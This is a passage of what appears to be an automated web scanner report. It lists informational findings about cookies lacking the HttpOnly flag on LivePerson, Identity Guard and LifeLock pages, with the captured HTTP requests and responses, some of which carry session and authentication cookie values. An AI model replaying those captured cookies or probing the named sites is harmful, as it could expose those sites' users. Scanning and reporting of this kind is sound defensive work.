Set-Cookie: LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; expires=Mon, 23-Apr-2012 12:11:31 GMT; path=/hc/71003277; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:11:31 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"565276490757-576158150099","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

14.58. http://sales.liveperson.net/hc/71003277/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE
HumanClickSiteContainerID_71003277

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagKnockPage&lpCallId=609040248906-708747063996&protV=20&lpjson=1&id=2386500579&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotelclub-chat-en%7Cnull%7Chotelclub-chat-buttondiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5427601522506632860; LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; HumanClickSiteContainerID_71003277=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:13:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1303647201834; expires=Mon, 25-Apr-2011 12:13:21 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:13:21 GMT
Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27397

lpConnLib.Process({"ResultSet": {"lpCallId":"609040248906-708747063996","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

14.59. http://sales.liveperson.net/hc/71003277/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY
HumanClickACTIVE

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagKnockPage&lpCallId=745409803464-13586354209&protV=20&lpjson=1&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotelclub-chat-en%7Cnull%7Chotelclub-chat-buttondiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:11:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=2881751932682469133; path=/hc/71003277
Set-Cookie: HumanClickACTIVE=1303647090025; expires=Mon, 25-Apr-2011 12:11:30 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:11:30 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27396

lpConnLib.Process({"ResultSet": {"lpCallId":"745409803464-13586354209","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...

14.60. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERACTIVITY_-1002
WC_GENERIC_ACTIVITYDATA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:32:53 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

14.61. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/Logoff

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_AUTHENTICATION_100000002776876
WC_USERACTIVITY_100000002776876
WC_AUTHENTICATION_-1002
WC_ACTIVEPOINTER
WC_USERACTIVITY_-1002
WC_GENERIC_ACTIVITYDATA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Logoff?langId=-1&storeId=10051&catalogId=&URL=INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_100000002776876=100000002776876%2cFk1AcrNuu6ExBXgm0keyztjSFMM%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_100000002776876=100000002776876%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvZN%2blny%2bAWBcNcgTgEYQTAn%2f5Qm%2ffFEPfXIv63cZlJiaE%2fMDdSGnMW%2fXgGZuQixVSag%0aE8V2RkfRemX3JuHpY1f44dEyBWljB5jE7W5JcSzsAjumrm2fXxlhGQX6XF9b5f6GKyQ%2fwj5G0ndt%0aS7FTQyrm; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:32:52 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff
Set-Cookie: WC_AUTHENTICATION_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


14.62. https://secure.lifelock.com/enrollment

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enrollment?promocode=next&uid=945440258CD1 HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:01 GMT
Set-Cookie: promoCode=NEXT; Expires=Mon, 25-Apr-2011 03:10:01 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:25:01 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...

14.63. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS376161

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:50 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:23:50 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=f6b470b0990eff9da9ecc49d049f8b7d5438784dc7b0156d4db397c6; Path=/
Vary: Accept-Encoding
Content-Length: 45537


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

14.64. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS376161

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:53 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:18:53 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=a42f38caea98de40600af4324215a09331f2a75f23110e424db3969d; Path=/
Vary: Accept-Encoding
Content-Length: 3810


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

14.65. https://secure.lifelock.com/scripts/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /scripts/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS376161

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/global.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:43 GMT
ETag: W/"3858-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:43 GMT
Connection: Keep-Alive
Content-Type: text/javascript
Set-Cookie: TS376161=58e3370f24dce77bbca52bcb5eaf49235438784dc7b0156d4db397bf; Path=/
Vary: Accept-Encoding
Content-Length: 3858

function loadJquery(){$(".info,.help,.infoTip").click(function(){return false}).tipsy({gravity:"w"});$(".help.lefty,.info.lefty").click(function(){return false}).tipsy({gravity:"e"});if($(".accept inp
...[SNIP]...

14.66. https://secure.lifelock.com/styles/login.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/login.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS376161

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/login.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:56 GMT
ETag: W/"1705-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:33:56 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=f5b613a8c090fe06b99a29858ee6feec31f2a75f23110e424db396a0; Path=/
Vary: Accept-Encoding
Content-Length: 1705

body,form,ul,ol,li,table,td,p,h1,h2,h3,img{margin:0;padding:0;border:none;}body{color:#4b4640;font-size:12px;font-family:Verdana,Arial,Helvetica,sans-serif;text-align:center;background-color:#ececec;}
...[SNIP]...

14.67. https://secure.lifelock.com/styles/theme-lifelock.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/theme-lifelock.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS376161

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/theme-lifelock.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"1587-1303446290000"
